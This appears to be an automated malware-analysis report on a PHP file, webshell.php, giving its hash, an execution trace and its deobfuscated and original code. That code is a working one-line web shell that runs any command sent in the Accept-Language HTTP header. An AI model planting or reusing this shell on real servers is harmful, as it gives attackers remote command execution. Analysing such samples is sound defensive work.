PHP Malware Analysis

webshell.php

md5: 76ee7a50044bef63528b134bdc44af48

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code

<?php

system($_SERVER['HTTP_ACCEPT_LANGUAGE']);

Execution traces

data/traces/76ee7a50044bef63528b134bdc44af48_trace-1676247312.6097.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:15:38.507481]
1	0	1	0.000137	393528
1	3	0	0.000180	393936	{main}	1		/var/www/html/uploads/webshell.php	0	0
2	4	0	0.000222	393936	system	0		/var/www/html/uploads/webshell.php	1	1	NULL
2	4	1	0.000246	393968
2	4	R			FALSE
1	3	1	0.000260	393936
			0.000294	314240
TRACE END   [2023-02-12 22:15:38.507666]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>